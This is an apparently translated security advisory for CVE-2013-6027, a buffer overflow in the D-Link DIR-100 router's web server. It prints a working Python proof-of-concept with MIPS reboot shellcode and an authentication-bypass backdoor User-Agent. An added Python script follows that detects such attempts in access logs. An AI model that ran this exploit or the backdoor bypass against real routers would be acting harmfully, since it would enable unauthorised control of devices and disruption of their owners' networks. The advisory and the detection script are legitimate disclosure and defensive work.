Release date:
Updated on:
Affected Systems:
D-Link DIR-100
Description:
--------------------------------------------------------------------------------
Bugtraq id: 63234
CVE (CAN) ID: CVE-2013-6027
The D-Link DIR-100 is a small broadband router with integrated firewall functionality.
A buffer overflow vulnerability exists in the RuntimeDiagnosticPing function of /bin/webs on the D-Link DIR-100 router. An authenticated remote administrator can exploit it to execute arbitrary commands by sending an overly long set/runtime/diagnostic/pingIp parameter to Tools/tools_misc.xgi.
<* Source: Craig Heffner *>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
import sys
import urllib2

try:
    url = 'http://%s/Tools/tools_misc.xgi?domain=a&set/runtime/diagnostic/pingIp=' % sys.argv[1]
except Exception, e:
    print str(e)
    print 'usage: %s <target ip>' % sys.argv[0]
    sys.exit(1)

# This is the actual payload; here it is a simple reboot shellcode.
# This payload size is limited to about 200 bytes, otherwise you'll crash elsewhere in /bin/webs.
payload  = "\x3c\x06\x43\x21"  # lui a2, 0x4321
payload += "\x34\xc6\xfe\xdc"  # ori a2, a2, 0xfedc
payload += "\x3c\x05\x28\x12"  # lui a1, 0x2812
payload += "\x34\xa5\x19\x69"  # ori a1, a1, 0x1969
payload += "\x3c\x04\xfe\xe1"  # lui a0, 0xfee1
payload += "\x34\x84\xde\xad"  # ori a0, a0, 0xdead
payload += "\x24\x02\x0f\xf8"  # li v0, 4088
payload += "\x01\x01\x01\x0c"  # syscall 0x40404

# The payload is split up; some of it before the return address on the stack, some after.
# This little snippet skips over the return address during execution.
# It assumes that your shellcode will not be using the $fp or $t9 registers.
move_sp_fp = "\x03\xa0\xf0\x21"  # move $fp, $sp
jump_code  = "\x27\xd9\x02\xd4"  # addiu $t9, $fp, 724
jump_code += "\x03\x21\xf8\x08"  # jr $t9
jump_code += "\x27\xE0\xFE"      # addiu $zero, $ra, -0x102

# Stitch together the payload chunk(s) and jump_code snippet
shellcode_p1 = move_sp_fp + payload[0:68] + jump_code + "DD"
if len(shellcode_p1) < 86:
    shellcode_p1 += "D" * (86 - len(shellcode_p1))
    shellcode_p2 = ""
else:
    shellcode_p2 = "DD" + payload[68:]

# Build the overflow buffer, with the return address and shellcode
# libc.so base address and ROP gadget offset for the DIR-100, revA, v1.13
# libc_base = 0x2aaee000
# ret_offset = 0x3243C
buf = shellcode_p1 + "\x2A\xB2\x04\x3C" + shellcode_p2

# Normally only admins can access the tools_misc.xgi page; use the backdoor user-agent to bypass authentication
req = urllib2.Request(url + buf, headers={'user-agent': 'xmlset_roodkcableoj28840ybtide'})
urllib2.urlopen(req)
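Since no vendor patch is listed, the practical defensive question is how to spot attempts at this exploit in traffic. The detection script below is an added example (Python 3); it is not part of the original advisory or of Craig Heffner's PoC. It assumes a combined-format access log captured by a reverse proxy or IDS sitting in front of the router, and it assumes (MAX_PINGIP_LEN) that a legitimate ping target is well under 64 bytes. The indicators it keys on are the ones on this page: the Tools/tools_misc.xgi path, the set/runtime/diagnostic/pingIp parameter, and the backdoor User-Agent string. The sample log lines are constructed, not captured traffic.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Indicators taken from the advisory: the vulnerable page and parameter, and the
# backdoor User-Agent the PoC uses to bypass admin authentication.
VULN_PATH = "/Tools/tools_misc.xgi"
VULN_PARAM = "set/runtime/diagnostic/pingIp"
BACKDOOR_UA = "xmlset_roodkcableoj28840ybtide"
# Assumption: a genuine ping target (IPv4 address or hostname) is far shorter
# than this; the PoC needs roughly 90 bytes just to reach the saved return address.
MAX_PINGIP_LEN = 64

# Combined-style access log line (assumed to come from a proxy/IDS in front of the router).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def pingip_values(target):
    """Return the percent-decoded raw bytes of every pingIp parameter in a request
    target that addresses the vulnerable page; an empty list otherwise."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return []
    values = []
    for field in parts.query.split("&"):
        key, _, value = field.partition("=")
        if key == VULN_PARAM:
            # Decode to bytes, not str: an overflow payload is binary, not UTF-8.
            values.append(unquote_to_bytes(value))
    return values


def inspect_request(target, user_agent):
    """Classify one request; returns a list of finding tags (empty means benign)."""
    findings = []
    if user_agent == BACKDOOR_UA:
        findings.append("backdoor-user-agent")
    for raw in pingip_values(target):
        if len(raw) > MAX_PINGIP_LEN:
            findings.append("pingIp-overlong")
        if any(b < 0x20 or b > 0x7E for b in raw):
            findings.append("pingIp-non-printable")
    return findings


def scan_log(lines):
    """Return (source_ip, findings) for every parseable line that has findings."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue  # unparseable or truncated line: skip rather than crash
        findings = inspect_request(m["target"], m["ua"])
        if findings:
            hits.append((m["src"], findings))
    return hits


# Constructed sample lines (not real traffic): a normal admin ping, an overflow
# attempt sent with the backdoor UA, a backdoor-UA probe of another page, and a
# truncated line that the parser must tolerate.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Oct/2013:10:00:01 +0000] "GET /Tools/tools_misc.xgi?domain=a'
    '&set/runtime/diagnostic/pingIp=10.0.0.1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [21/Oct/2013:10:00:02 +0000] "GET /Tools/tools_misc.xgi?domain=a'
    '&set/runtime/diagnostic/pingIp=%00%ff' + "A" * 120 +
    ' HTTP/1.1" 200 0 "-" "xmlset_roodkcableoj28840ybtide"',
    '192.0.2.77 - - [21/Oct/2013:10:00:03 +0000] "GET /index.htm HTTP/1.1" 200 2048 "-" '
    '"xmlset_roodkcableoj28840ybtide"',
    '192.0.2.78 - - [21/Oct/2013:10:00:04 +0000] "GET /Tools/tools_misc.xgi?dom',
]

if __name__ == "__main__":
    for src, findings in scan_log(SAMPLE_LOG):
        print(src, ", ".join(findings))
```

The backdoor User-Agent is the higher-confidence signal: it has no legitimate use, so any hit is worth an alert on its own, regardless of which page was requested. The pingIp checks are there because an attacker who already holds admin credentials would not need the backdoor string, and a length or byte-range anomaly in that parameter still catches the overflow attempt.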
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
D-Link
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users of the affected product monitor the vendor's homepage to obtain the latest version:
http://www.dlink.com/
Related reading:
D-Link router firmware backdoor Vulnerability
Reverse Engineering youxun Technology (D-Link) router firmware Backdoor
How do I decompile the D-Link router firmware program and find its backdoor?